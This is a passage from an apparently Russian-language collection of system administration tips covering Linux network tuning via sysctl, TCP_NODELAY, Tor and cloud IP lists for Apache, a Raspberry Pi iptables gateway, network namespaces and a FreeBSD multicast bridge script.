чтобы обрабатывать кучу softIRQ, драйвер сохраняет данные в пуле (polling data); следите за состояниями `dropped` (число пакетов, отброшенных из-за того, что `netdev_max_backlog` был превышен) и `squeezed` (число раз когда ksoftirq превысил `netdev_budget`). Как: Команда проверки: sysctl net.core.netdev_budget_usecs Как изменить: sysctl -w net.core.netdev_budget_usecs value Как мониторить: cat /proc/net/softnet_stat или скриптом. Что: `netdev_budget` максимальное количество пакетов, взятых со всех интерфейсов за один цикл опроса (NAPI poll). В одном цикле опроса интерфейсы, которые зарегистрированы для опроса, зондируются круговым способом. Кроме того, цикл опроса не может превышать `netdev_budget_usecs` микросекунд, даже если `netdev_budget` не был исчерпан. Как: Команда проверки: sysctl net.core.netdev_budget Как изменить: sysctl -w net.core.netdev_budget value Как мониторить: cat /proc/net/softnet_stat или скриптом. Что: `dev_weight` максимальное количество пакетов, которое ядро может обработать при прерывании NAPI, это переменная для каждого процессора. Для драйверов, которые поддерживают LRO или GRO_HW, аппаратно агрегированный пакет считается в этом пакете одним. Как: Команда проверки: sysctl net.core.dev_weight Как изменить: sysctl -w net.core.dev_weight value Как мониторить: cat /proc/net/softnet_stat или скриптом. Что: `netdev_max_backlog` максимальное количество пакетов, находящихся в очереди на стороне INPUT (входной qdisc_), когда интерфейс получает пакеты быстрее, чем ядро может их обработать. Как: Команда проверки: sysctl net.core.netdev_max_backlog Как изменить: sysctl -w net.core.netdev_max_backlog value Как мониторить: cat /proc/net/softnet_stat или скриптом. Исходящие QDisc - txqueuelen (длина очереди tx) и default_qdisc Что: `txqueuelen` максимальное количество пакетов, поставленных в очередь на стороне вывода. Почему: buffer/queue появление разрывов соединений, а также примением контроля трафика tc (traffic control). Как: Команда проверки: ifconfig ethX Как изменить: ifconfig ethX txqueuelen value Как мониторить: ip -s link Что: `default_qdisc` дисциплина очереди по умолчанию, используемая для сетевых устройств. Почему: Каждое приложение имеет разную нагрузку и требует контроля трафика, оно также используется для борьбы с излишней сетевой буферизацией bufferbloat. Как: Команда проверки: sysctl net.core.default_qdisc Как изменить: sysctl -w net.core.default_qdisc value Как мониторить: tc -s qdisc ls dev ethX Буферы/очереди чтения и записи (TCP Read and Write Buffers/Queues) Что: `tcp_rmem` - min (минимальный размер доступный при создании сокета), default (начальный размер), max (максимальный размер) - максимальный размер приёмного буфера TCP. Почему: буфер/очередь приложения для записи/отправки данных. Понять последствия может помочь статья https://blog.cloudflare.com/the-story-of-one-latency-spike/ Как: Команда проверки: sysctl net.ipv4.tcp_rmem Как изменить: sysctl -w net.ipv4.tcp_rmem="min default max" когда меняете значение по умолчанию, не забудьте перезагрузить приложения в пользовательском окружении (т.е. ваш веб-сервер, nginx, и т.п.) Как мониторить: cat /proc/net/sockstat Что: `tcp_wmem` - min (минимальный размер доступный при создании сокета), default (начальный размер), max (максимальный размер) - размер буфера отправки, используемого сокетами TCP. Как: Команда проверки: sysctl net.ipv4.tcp_wmem Как изменить: sysctl -w net.ipv4.tcp_wmem="min default max" когда меняете значение по умолчанию, не забудьте перезагрузить приложения в пользовательском окружении (т.е. ваш веб-сервер, nginx, и т.п.) Как мониторить: cat /proc/net/sockstat Что: `tcp_moderate_rcvbuf` - если установлено, TCP выполняет автонастройку приёмного буфера, пытаясь автоматически определить размер буфера. Как: Команда проверки: sysctl net.ipv4.tcp_moderate_rcvbuf Как изменить: sysctl -w net.ipv4.tcp_moderate_rcvbuf value Как мониторить: cat /proc/net/sockstat TCP FSM и алгоритм перегрузки (Honorable mentions - TCP FSM and congestion algorithm)
`sysctl net.core.somaxconn` - обеспечивает верхний предел значения параметра backlog, передаваемого в функцию `listen()` (https://eklitzke.org/how-tcp-sockets-work), известный пользователям как `SOMAXCONN`. Если вы меняете это значение, вы также должны изменить в своём приложении совместимые значения (т.е. nginx backlog).
`cat /proc/sys/net/ipv4/tcp_fin_timeout` - указывает количество секунд ожидания окончательного пакета FIN, прежде чем сокет будет принудительно закрыт. Это строго является нарушением спецификации TCP, но требуется для предотвращения атак типа "отказ в обслуживании".
`cat /proc/sys/net/ipv4/tcp_available_congestion_control` - показывает доступные варианты управления перегрузкой, которые зарегистрированы.
`cat /proc/sys/net/ipv4/tcp_congestion_control` - устанавливает алгоритм управления перегрузкой, используемое для новых соединений.
`cat /proc/sys/net/ipv4/tcp_max_syn_backlog` - задаёт максимальное число запросов подключения в очереди, которые еще не получили подтверждения от подключающегося клиента; если это число будет превышено, ядро начнёт отбрасывать запросы.
`cat /proc/sys/net/ipv4/tcp_syncookies` - включён/выключен [syn cookies](https://en.wikipedia.org/wiki/SYN_cookies), полезен для защиты от syn flood атак (https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/).
`cat /proc/sys/net/ipv4/tcp_slow_start_after_idle` - включён/выключен медленный старт tcp. Как мониторить: общая сводка netstat -atn | awk '/tcp/ {print $6}' | sort | uniq -c счётчики по определённому состоянию: `established`, `syn-sent`, `syn-recv`, `fin-wait-1`, `fin-wait-2`, `time-wait`, `closed`, `close-wait`, `last-ack`, `listening`, `closing`: ss -neopt state time-wait | wc -l` tcp статистика netstat -st более читаемая tcp статистика nstat -a обобщённая статистика сокетов cat /proc/net/sockstat детальная статистика, описание полей смотрите: https://www.kernel.org/doc/Documentation/networking/proc_net_tcp.txt cat /proc/net/tcp `ListenOverflows` и `ListenDrops` - важные поля для наблюдения cat /proc/net/netstat читаемый вариант /proc/net/netstat (https://sa-chernomor.livejournal.com/9858.html) cat /proc/net/netstat | awk '(f==0) { i=1; while ( i<=NF) {n[i] = $i; i++ }; f=1; next} \ (f==1){ i=2; while ( i<=NF){ printf "%s = %d\n", n[i], $i; i++}; f=0} ' | grep -v "= 0 Источник: https://commons.wikimedia.or/wiki/File:Tcp_state_diagram_fixed_new.svg Сетевые утилиты для тестирования и мониторинга
iperf3 (https://iperf.fr/) - пропускная способность сети
vegeta (https://github.com/tsenart/vegeta) - нагрузочное тестирование HTTP
netdata (https://github.com/firehol/netdata) - система распределённого мониторинга производительности и работоспособности в реальном времени Рекомендации
https://www.kernel.org/doc/Documentation/sysctl/net.txt
https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt
https://www.kernel.org/doc/Documentation/networking/scaling.txt
https://www.kernel.org/doc/Documentation/networking/proc_net_tcp.txt
https://www.kernel.org/doc/Documentation/networking/multiqueue.txt
http://man7.org/linux/man-pages/man7/tcp.7.html
http://man7.org/linux/man-pages/man8/tc.8.html
http://www.ece.virginia.edu/cheetah/documents/papers/TCPlinux.pdf
https://netdevconf.org/1.2/papers/bbr-netdev-1.2.new.new.pdf
https://blog.cloudflare.com/how-to-receive-a-million-packets/
https://blog.cloudflare.com/how-to-achieve-low-latency/
https://blog.packagecloud.io/eng/2016/06/22/monitoring-tuning-linux-networking-stack-receiving-data/
https://www.youtube.com/watch?v=6Fl1rsxk4JQ
https://oxnz.github.io/2016/05/03/performance-tuning-networking/
https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/xl710-x710-performance-tuning-linux-guide.pdf
https://access.redhat.com/sites/default/files/attachments/20150325_network_performance_tuning.pdf
https://medium.com/@matteocroce/linux-and-freebsd-networking-cbadcdb15ddd
https://blogs.technet.microsoft.com/networking/2009/08/12/where-do-resets-come-from-no-the-stork-does-not-bring-them/
https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/multi-core-processor-based-linux-paper.pdf
http://syuu.dokukino.com/2013/05/linux-kernel-features-for-high-speed.html
https://www.bufferbloat.net/projects/codel/wiki/Best_practices_for_benchmarking_Codel_and_FQ_Codel/
https://software.intel.com/en-us/articles/setting-up-intel-ethernet-flow-director
https://courses.engr.illinois.edu/cs423/sp2014/Lectures/LinuxDriver.pdf
https://www.coverfire.com/articles/queueing-in-the-linux-network-stack/
http://vger.kernel.org/~davem/skb.html
https://www.missoulapubliclibrary.org/ftp/LinuxJournal/LJ13-07.pdf
https://opensourceforu.com/2016/10/network-performance-monitoring/
https://www.yumpu.com/en/document/view/55400902/an-adventure-of-analysis-and-optimisation-of-the-linux-networking-stack
https://lwn.net/Articles/616241/
https://medium.com/@duhroach/tools-to-profile-networking-performance-3141870d5233
https://www.lmax.com/blog/staff-blogs/2016/05/06/navigating-linux-kernel-network-stack-receive-path/
https://es.net/host-tuning/100g-tuning/
http://tcpipguide.com/free/t_TCPOperationalOverviewandtheTCPFiniteStateMachineF-2.htm
http://veithen.github.io/2014/01/01/how-tcp-backlog-works-in-linux.html
https://people.cs.clemson.edu/~westall/853/tcpperf.pdf
http://tldp.org/HOWTO/Traffic-Control-HOWTO/classless-qdiscs.html
https://es.net/assets/Papers-and-Publications/100G-Tuning-TechEx2016.tierney.pdf
https://www.kernel.org/doc/ols/2009/ols2009-pages-169-184.pdf
https://devcentral.f5.com/articles/the-send-buffer-in-depth-21845
http://packetbomb.com/understanding-throughput-and-tcp-windows/
https://www.speedguide.net/bdp.php
https://www.switch.ch/network/tools/tcp_throughput/
https://www.ibm.com/support/knowledgecenter/en/SSQPD3_2.6.0/com.ibm.wllm.doc/usingethtoolrates.html
https://blog.tsunanet.net/2011/03/out-of-socket-memory.html
https://unix.stackexchange.com/questions/12985/how-to-check-rx-ring-max-backlog-and-max-syn-backlog-size
https://serverfault.com/questions/498245/how-to-reduce-number-of-time-wait-processes
https://unix.stackexchange.com/questions/419518/how-to-tell-how-much-memory-tcp-buffers-are-actually-using
https://eklitzke.org/how-tcp-sockets-work
https://www.linux.com/learn/intro-to-linux/2017/7/introduction-ss-command
https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
https://loicpefferkorn.net/2016/03/linux-network-metrics-why-you-should-use-nstat-instead-of-netstat/
http://assimilationsystems.com/2015/12/29/bufferbloat-network-best-practice/

Актуальность опции TCP_NODELAY для распределённых приложений (доп. ссылка 1) [комментарии]

Один из инженеров Amazon Web Services (AWS) разобрал заблуждения, связанные с повышением эффективности передачи мелких сообщений при использовании алгоритма Нейгла, применяемого по умолчанию в TCP/IP стеке. Рекомендации сводятся к отключению по умолчанию алгоритма Нейгла через выставление опции TCP_NODELAY для сетевых сокетов при помощи вызова setsockopt. setsockopt(descriptor, SOL_TCP, TCP_NODELAY, &one, sizeof(one)); Алгоритм Нейгла позволяет агрегировать мелкие сообщения для снижения трафика - приостанавливает отправку новых сегментов TCP до получения подтверждения о приёме ранее отправленных данных. Например, без применения агрегирования при отправке 1 байта, дополнительно отправляется 40 байтов с заголовками пакета. В современных условиях использование алгоритма Нейгла приводит к заметному возрастанию задержек, неприемлемых для интерактивных и распределённых приложений. Приводится три основных довода в пользу использования по умолчанию опции TCP_NODELAY, отключающей алгоритм Нейгла: 1. Несовместимость алгоритма Нейгла с оптимизацией "delayed ACK", при которой ACK-ответ направляется не сразу, а после получения ответных данных. Проблема в том, что в алгоритме Нейгла поступление ACK-пакета является сигналом для отправки агрегированных данных, а если ACK-пакет не поступил, отправка выполняется при наступлении таймаута. Таким образом, возникает замкнутый круг и ACK-пакет как сигнал не работает, так как другая сторона не получает данные из-за их накопления на стороне отправителя, а отправитель не отправляет их до таймаута, так как не получает ACK-пакет. 2. RFC для алгоритма Нейгла принят в 1984 году и он не рассчитан на параметры современных высокоскоростных сетей и серверов в датацентрах, что приводит к возникновению проблем с отзывчивостью. Задержка между отправкой запроса и получением ответа (RTT) в современных сетях составляет 0.5 мс + несколько миллисекунд при обмене данными между датацентрами в одном регионе + до сотни миллисекунд при отправке по всему миру. За эти миллисекунды современный сервер способен выполнить огромный объём работы. 3. Современные распределённые приложения давно не отправляют единичные байты данных, а агрегирование мелких данных обычно реализуется на уровне приложения. Даже если размер полезных данных составляет 1 байт, то, как правило, фактически размер отправляемой информации существенно возрастает после применения сериализации, использования API-обвязок в JSON и отправки с использованием TLS-шифрования. Экономия 40 байтов становится не столь актуальной.

Диапазоны IP-адресов облачных сервисов Amazon, Google, OVH, DigitalOcean и Microsoft (доп. ссылка 1) [комментарии]

Иногда на сервере возникает необходимость динамического определения подключения пользователя, транзитно использующего окружение в одном из арендуемых облачных сервисов. Проект cloud-ranges поддерживает актуальную БД диапазонов адресов различных облачных операторов, которую можно загрузить со страницы https://github.com/pry0cc/cloud-ranges/tree/master/companies Также могут оказаться полезными база IP в привязке к странам: ftp://ftp.ripe.net/ripe/dbase/split/ripe.db.inetnum.gz и базы адресов выходных узлов Tor: https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=IP_текущего хоста https://www.dan.me.uk/torlist/ https://torstatus.rueckgr.at/ip_list_all.php/Tor_ip_list_ALL.csv https://raw.githubusercontent.com/Machou/tor-ip-list/master/Tor_ip_list_ALL.csv Преобразовать указанные списки для mod_geo или mod_geo2 можно простым скриптом, например, curl https://raw.githubusercontent.com/Machou/tor-ip-list/master/Tor_ip_list_ALL.csv https://torstatus.rueckgr.at/ip_list_all.php/Tor_ip_list_ALL.csv | sort| uniq | grep -v "^#" |grep -E '^[0-9]+\.[0-9]+\.[0-9]+' | sed 's/$/ TT/' > /etc/httpd/conf/tor_db.txt После включения mod_geo2 в Apache LoadModule geo2_module /usr/lib64/httpd/modules/mod_geo2.so <IfModule geo2_module> GEOTable /etc/httpd/conf/tor_db.txt GEOActive Off </IfModule> в скриптах можно узнавать факт подключения через облачных провайдеров или Tor анализируя переменную окружения "HTTP_IP_GEO" (в примере выше для адресов Tor будет выставляться значение "TT").

Домашний шлюз на Raspberry Pi Автор: Павел Самсонов [комментарии]

Нам понадобится: Raspberry Pi (у меня Raspberry Pi 1 модель B), вторая сетевая карта с интерфейсом USB (например, DLink DUB-E100) и SD карта с записанным образом Raspbian. Сразу скажу, что в Raspbian Wheezy ядро собрано без опций CONFIG_NETFILTER_XT_TARGET_TCPMSS=y CONFIG_NETFILTER_XT_MATCH_TCPMSS=y и будут проблемы с некоторыми сайтами. Придется позже пересобрать ядро с этими опциями. Итак, установим пакеты: sudo apt-get install ntp # Нам нужно точное время sudo update-rc.d ntp enable sudo service ntp start sudo apt-get install dnsmasq # Роутер будет резолвером DNS для локальной сети sudo update-rc.d dnsmasq enable sudo apt-get dnsmasq start Настроим локальную сеть, для этого отредактируем файл /etc/network/interfaces: auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.4.1 netmask 255.255.255.0 У нас eth0 - локальная сеть, eth1 (DLink) будет для Internet. Теперь установим пакеты для pppoe: sudo apt-get install pppoe pppoeconf Настроим интернет соединение pppoe с помощью мастера pppoeconf: sudo pppoeconf Теперь осталось настроить firewall. Во-первых включим маршрутизацию: отредактируем файл /etc/sysctl.conf и установим в нем net.ipv4.ip_forward=1 и выполним sudo sysctl net.ipv4.ip_forward=1 Возьмем за основу firewall файл /etc/firewall: # Generated by iptables-save v1.4.14 on Thu Sep 15 16:51:15 2016 *nat :PREROUTING ACCEPT [1:32] :INPUT ACCEPT [0:0] :OUTPUT ACCEPT [2:307] :POSTROUTING ACCEPT [1:240] -A POSTROUTING -o ppp0 -j MASQUERADE COMMIT # Completed on Thu Sep 15 16:51:15 2016 # Generated by iptables-save v1.4.14 on Thu Sep 15 16:51:15 2016 *filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] :TINYWALL-FORWARD - [0:0] :TINYWALL-INPUT - [0:0] :TINYWALL-OUTPUT - [0:0] -A INPUT -m state --state INVALID -j LOG --log-prefix "CHAIN=TINYWALL-INVALID-INPUT -A INPUT -m state --state INVALID -j DROP -A INPUT -m state --state NEW -j LOG --log-prefix "CHAIN=TINYWALL-NEW-INPUT " #Это необязательная строка -A INPUT -p icmp -j ACCEPT -A INPUT -s 192.168.4.0/24 -p udp -m udp --dport 53 -m state --state NEW -j ACCEPT -A INPUT -s 127.0.0.1/32 -p udp -m udp --dport 53 -m state --state NEW -j ACCEPT -A INPUT -s 192.168.4.0/24 -p tcp -m tcp --dport 22 -m state --state NEW -j ACCEPT -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -j TINYWALL-INPUT -A INPUT -j LOG --log-prefix "CHAIN=TINYWALL-INPUT-REJECT " -A INPUT -j REJECT --reject-with icmp-admin-prohibited -A FORWARD -m state --state INVALID -j LOG --log-prefix "CHAIN=TINYWALL-INVALID-FORW " -A FORWARD -m state --state INVALID -j DROP -A FORWARD -m state --state NEW -j LOG --log-prefix "CHAIN=TINYWALL-NEW-FORW " -A FORWARD -p icmp -j ACCEPT -A FORWARD -m state --state NEW -j LOG --log-prefix "CHAIN=TINYWALL-NEW-FORW " #Это необязательная строка -A FORWARD -s 192.168.4.0/24 -p udp -m udp --dport 53 -m state --state NEW -j ACCEPT -A FORWARD -s 192.168.4.0/24 -m state --state NEW -j ACCEPT -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT -A FORWARD -j TINYWALL-FORWARD -A FORWARD -j LOG --log-prefix "CHAIN=TINYWALL-FORW-REJECT " -A FORWARD -j REJECT --reject-with icmp-admin-prohibited -A OUTPUT -m state --state INVALID -j DROP -A OUTPUT -m state --state NEW -j LOG --log-prefix "CHAIN=TINYWALL-NEW-OUTPUT " -A OUTPUT -p icmp -j ACCEPT -A OUTPUT -m state --state NEW -j LOG --log-prefix "CHAIN=TINYWALL-NEW-OUTPUT " #Это необязательная строка -A OUTPUT -p udp -m udp --dport 53 -m state --state NEW -j ACCEPT -A OUTPUT -p udp -m udp --sport 53 -m state --state NEW -j ACCEPT -A OUTPUT -p udp -m udp --dport 123 -m state --state NEW -j ACCEPT -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A OUTPUT -j TINYWALL-OUTPUT -A OUTPUT -j LOG --log-prefix "CHAIN=TINYWALL-OUTPUT-REJECT " -A OUTPUT -j REJECT --reject-with icmp-admin-prohibited -A FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1492 COMMIT # Completed on Thu Sep 15 16:51:15 2016 # Generated by iptables-save v1.4.14 on Thu Sep 15 16:51:15 2016 *mangle :PREROUTING ACCEPT [2857:1106716] :INPUT ACCEPT [2787:1101011] :FORWARD ACCEPT [70:5705] :OUTPUT ACCEPT [2005:212971] :POSTROUTING ACCEPT [2163:232874] COMMIT # Completed on Thu Sep 15 16:51:15 2016 Запишем в /etc/rc.local строчку iptables-restore < /etc/firewall Шлюз готов, можно использовать 192.168.4.1 как шлюз и DNS сервер. Напоследок текст скрипта log-analyzer: #!/bin/bash while read string do echo "" export $string 2>/dev/null HSRC=`host $SRC 2>/dev/null | grep "domain name pointer" | awk '{ print $5 }'` HDST=`host $DST 2>/dev/null | grep "domain name pointer" | awk '{ print $5 }'` echo $PROTO | grep "^[[:digit:]]*$" > /dev/null && unset DPT PROTO=`grep "[[:space:]]$PROTO[[:space:]]" /etc/protocols | awk '{ print $1 }'` HPROTO=`grep -i "[[:space:]]$DPT/$PROTO" /etc/services | sed 's/\\t/\\ /g' | sed 's/\\ \\ /\\ /g'` HSPROTO=`grep -i "[[:space:]]$SPT/$PROTO" /etc/services | sed 's/\\t/\\ /g'| sed 's/\\ \\ /\\ /g'` HSRC=${HSRC:-$SRC} HDST=${HDST:-$DST} HPROTO=${HPROTO:-"$DPT/$PROTO"} HSPROTO=${HSPROTO:-"$SPT/$PROTO"} set $string echo "$CHAIN $HDST ($HPROTO) <=== $HSRC ($HSPROTO) /$1 $2 $3/" done Его можно запустить командой: sudo tail -n 50 -f /var/log/syslog | grep "TINYWALL" | /<path>/log-analyzer

Использование нескольких сетевых стеков в Linux Автор: Roman Timofeev ( ^rage^ ) [комментарии]

В linux относительно давно появилась такая замечательная вещь, как неймспейсы (namespaces). Основное применение данной технологии - контейнерная виртуализация, но и на маршрутизаторе можно придумать много разных применений, так как среди неймспейсов есть "network namespaces". Network namespaces позволяют в рамках одной машины в каждом неймспейсе иметь:
свой набор таблиц маршрутизации (а их 2^31-1 шт)
свою arp-таблицу
свои правила iptables
свои устройства (а значит и qdisc + class'ы tc) NB: для выполнения нижеследующих примеров крайне желательно иметь свежий iproute2 и ядро. Создаются неймспейсы достаточно скучно и просто: ip netns add VROUTER ip netns add KUKYSEVRACI Создадим "виртуальны шнурок": ip link add name ve0a type veth peer name ve0b Добавим интерфейсы внутрь VROUTER: ip link set dev eth0 netns VROUTER ip link set dev ve0b netns VROUTER Выполнить команду в контексте определённого неймспейса можно так: ip netns exec VROUTER ip link show Настроим адреса: ip netns exec VROUTER ip a a 192.168.1.1/24 dev ve0b ip a a 192.168.1.2/24 dev ve0a ip netns exec VROUTER ip a a 10.140.48.16/24 dev eth0 Поднимем интерфейсы: ip link set dev ve0a up ip netns exec VROUTER ip link set dev eth0 up ip netns exec VROUTER ip link set dev ve0b up Шлюз по умолчанию: ip netns exec VROUTER ip r a default via 10.140.48.1 Посмотрим, что получилось: root@laptus:~# ip netns exec VROUTER ip r s default via 10.140.48.1 dev eth0 10.140.48.0/24 dev eth0 proto kernel scope link src 10.140.48.16 192.168.1.0/24 dev ve0b proto kernel scope link src 192.168.1.1 Добавим NAT: ip netns exec VROUTER iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to-source 10.140.48.16 Сделаем пару трейсов: root@laptus:~# ip netns exec VROUTER traceroute -q 1 -I opennet.ru traceroute to opennet.ru (77.234.201.242), 30 hops max, 60 byte packets 1 10.140.48.1 (10.140.48.1) 0.148 ms 2 10.140.0.1 (10.140.0.1) 0.245 ms 3 border.yournet.ru (91.204.148.17) 0.436 ms 4 alisa.yournet.ru (91.204.151.2) 0.521 ms 5 sev-gw.yournet.ru (91.204.148.2) 8.975 ms 6 bl16-1-gw.spb.runnet.ru (194.190.255.25) 1.321 ms 7 bl16-1-gw.spb.runnet.ru (194.85.40.170) 1.785 ms 8 s14-1-gw.spb.runnet.ru (194.85.40.81) 1.456 ms 9 vuztc.spb.runnet.ru (194.190.255.170) 1.987 ms 10 opennet.ru (77.234.201.242) 2.395 ms root@laptus:~# traceroute -q 1 -I opennet.ru traceroute to opennet.ru (77.234.201.242), 30 hops max, 60 byte packets 1 192.168.1.1 (192.168.1.1) 0.094 ms 2 10.140.48.1 (10.140.48.1) 0.751 ms 3 10.140.0.1 (10.140.0.1) 1.277 ms 4 border.yournet.ru (91.204.148.17) 2.061 ms 5 alisa.yournet.ru (91.204.151.2) 2.911 ms 6 sev-gw.yournet.ru (91.204.148.2) 6.770 ms 7 bl16-1-gw.spb.runnet.ru (194.190.255.25) 3.622 ms 8 bl16-1-gw.spb.runnet.ru (194.85.40.170) 5.262 ms 9 s14-1-gw.spb.runnet.ru (194.85.40.81) 4.135 ms 10 vuztc.spb.runnet.ru (194.190.255.170) 4.710 ms 11 opennet.ru (77.234.201.242) 7.220 ms

Multicast во FreeBSD без igmpproxy (доп. ссылка 1) (доп. ссылка 2) Автор: nuclight [комментарии]

Иван Рожук опубликовал скрипт mcastbr2.sh для проброса multicast через шлюз на базе FreeBSD штатными средствами netgraph, без использования неработающих у многих igmpproxy и mrouted. #!/bin/sh # Copyright (c) 2011 Rozhuk Ivan <rozhuk.im@gmail.com> # All rights reserved. # # Subject to the following obligations and disclaimer of warranty, use and # redistribution of this software, in source or object code forms, with or # without modifications are expressly permitted by Whistle Communications; # provided, however, that: # 1. Any and all reproductions of the source or object code must include the # copyright notice above and the following disclaimer of warranties; and # 2. No rights are granted, in any manner or form, to use Whistle # Communications, Inc. trademarks, including the mark "WHISTLE # COMMUNICATIONS" on advertising, endorsements, or otherwise except as # such appears in the above copyright notice or in the software. # # THIS SOFTWARE IS BEING PROVIDED BY WHISTLE COMMUNICATIONS "AS IS", AND # TO THE MAXIMUM EXTENT PERMITTED BY LAW, WHISTLE COMMUNICATIONS MAKES NO # REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, REGARDING THIS SOFTWARE, # INCLUDING WITHOUT LIMITATION, ANY AND ALL IMPLIED WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT. # WHISTLE COMMUNICATIONS DOES NOT WARRANT, GUARANTEE, OR MAKE ANY # REPRESENTATIONS REGARDING THE USE OF, OR THE RESULTS OF THE USE OF THIS # SOFTWARE IN TERMS OF ITS CORRECTNESS, ACCURACY, RELIABILITY OR OTHERWISE. # IN NO EVENT SHALL WHISTLE COMMUNICATIONS BE LIABLE FOR ANY DAMAGES # RESULTING FROM OR ARISING OUT OF ANY USE OF THIS SOFTWARE, INCLUDING # WITHOUT LIMITATION, ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, # PUNITIVE, OR CONSEQUENTIAL DAMAGES, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES, LOSS OF USE, DATA OR PROFITS, HOWEVER CAUSED AND UNDER ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF # THIS SOFTWARE, EVEN IF WHISTLE COMMUNICATIONS IS ADVISED OF THE POSSIBILITY # OF SUCH DAMAGE. # # Author: Rozhuk Ivan <rozhuk.im@gmail.com> # # $FreeBSD: src/sys/netgraph/ng_l2ccp.c,v 1.0.0.1 2010/09/19 08:13:06 kensmith Exp $ # This script create bridge between two network interfaces # downstream - network with clients # upstream - network with multicast # downstream <-IGMP-> upstream # downstream <-UDP<- upstream # only packets with multicast dst mac addr forwarded trouth bridge and (!) not pass to network stack IF_UPSTREAM="$2" IF_DOWNSTREAM="$3" BR_NAME="${IF_UPSTREAM}-${IF_DOWNSTREAM}-br" PATTERN_MCAST_IGMP="ether[0] & 1 = 1 and (ether[0:4] != 0xffffffff or ether[4:2] != 0xffff) and ip[9] = 2" PATTERN_MCAST_IGMP_UDP="ether[0] & 1 = 1 and (ether[0:4] != 0xffffffff or ether[4:2] != 0xffff) and (ip[9] = 17 or ip[9] = 2)" # allways NOT MATCH BPFPROG_PASSTOUTH="bpf_prog_len=1 bpf_prog=[ { code=6 jt=0 jf=0 k=0 } ]" usage_msg() { echo "usage: start|stop upstreamIF downstreamIF1" echo "This create bridge beetwen two IFs for IGMP, and UDP from upstreamIF to downstreamIF1" } if [ -z "${IF_UPSTREAM}" -o -z "${IF_DOWNSTREAM}" ]; then usage_msg return 1 fi if ! ifconfig "$IF_UPSTREAM" > /dev/null 2>&1 ; then usage_msg echo "Invalid upstream interface: ${IF_UPSTREAM}" return 1 fi if ! ifconfig "$IF_DOWNSTREAM" > /dev/null 2>&1 ; then usage_msg echo "Invalid downstream interface: ${IF_DOWNSTREAM}" return 1 fi case "$1" in start) # load modules kldload ng_ether > /dev/null 2>&1 kldload ng_bpf > /dev/null 2>&1 echo "start bridging beetwen ${IF_UPSTREAM} and ${IF_DOWNSTREAM}" BPFPROG_MCAST_IGMP=$( tcpdump -s 65535 -ddd ${PATTERN_MCAST_IGMP} | \ ( read len ; \ echo -n "bpf_prog_len=$len " ; \ echo -n "bpf_prog=[" ; \ while read code jt jf k ; do \ echo -n " { code=$code jt=$jt jf=$jf k=$k }" ; \ done ; \ echo " ]" ) ) BPFPROG_MCAST_IGMP_UDP=$( tcpdump -s 65535 -ddd ${PATTERN_MCAST_IGMP_UDP} | \ ( read len ; \ echo -n "bpf_prog_len=$len " ; \ echo -n "bpf_prog=[" ; \ while read code jt jf k ; do \ echo -n " { code=$code jt=$jt jf=$jf k=$k }" ; \ done ; \ echo " ]" ) ) # create and connect nodes ngctl mkpeer ${IF_UPSTREAM}: bpf lower ${IF_UPSTREAM}-lower ngctl name ${IF_UPSTREAM}:lower ${BR_NAME}-bpf ngctl connect ${IF_UPSTREAM}: ${BR_NAME}-bpf: upper ${IF_UPSTREAM}-upper ngctl connect ${IF_DOWNSTREAM}: ${BR_NAME}-bpf: lower ${IF_DOWNSTREAM}-lower ngctl connect ${IF_DOWNSTREAM}: ${BR_NAME}-bpf: upper ${IF_DOWNSTREAM}-upper # configure BPF node ngctl msg ${BR_NAME}-bpf: setprogram { thisHook=\"${IF_UPSTREAM}-lower\" ifMatch=\"${IF_DOWNSTREAM}-lower\" ifNotMatch=\"${IF_UPSTREAM}-upper\" ${BPFPROG_MCAST_IGMP_UDP} } ngctl msg ${BR_NAME}-bpf: setprogram { thisHook=\"${IF_UPSTREAM}-upper\" ifMatch=\"\" ifNotMatch=\"${IF_UPSTREAM}-lower\" ${BPFPROG_PASSTOUTH} } ngctl msg ${BR_NAME}-bpf: setprogram { thisHook=\"${IF_DOWNSTREAM}-lower\" ifMatch=\"${IF_UPSTREAM}-lower\" ifNotMatch=\"${IF_DOWNSTREAM}-upper\" ${BPFPROG_MCAST_IGMP} } ngctl msg ${BR_NAME}-bpf: setprogram { thisHook=\"${IF_DOWNSTREAM}-upper\" ifMatch=\"\" ifNotMatch=\"${IF_DOWNSTREAM}-lower\" ${BPFPROG_PASSTOUTH} } # configure net if ngctl msg ${IF_UPSTREAM}: setautosrc 1 ngctl msg ${IF_UPSTREAM}: setpromisc 1 #ngctl msg ${IF_DOWNSTREAM}: setautosrc 0 ngctl msg ${IF_DOWNSTREAM}: setpromisc 1 ;; stop) echo "stop" # remove hooks and nodes ngctl rmhook ${IF_UPSTREAM}: lower ngctl rmhook ${IF_UPSTREAM}: upper ngctl rmhook ${IF_DOWNSTREAM}: lower ngctl rmhook ${IF_DOWNSTREAM}: upper ngctl shutdown ${BR_NAME}-bpf: # unload modules #kldunload ng_ether > /dev/null 2>&1 #kldunload ng_bpf > /dev/null 2>&1 ;; *) usage_msg esac return 0 Суть скрипта: между интерфейсами (ng_ether) создается подобие бриджа с ng_bpf посередине, который пропускает через себя только мультикаст. Причем эти пакеты проходят полностью в обход сетевого стека. Дополнение. Создать мост между em0 и re0, где re0 подключён к сети с мультикастом: mcastbr2.sh start re0 em0 Удалить мост: mcastbr2.sh stop re0 em0 История igmpproxy и mrouted у меня работать отказались, после нескольких часов 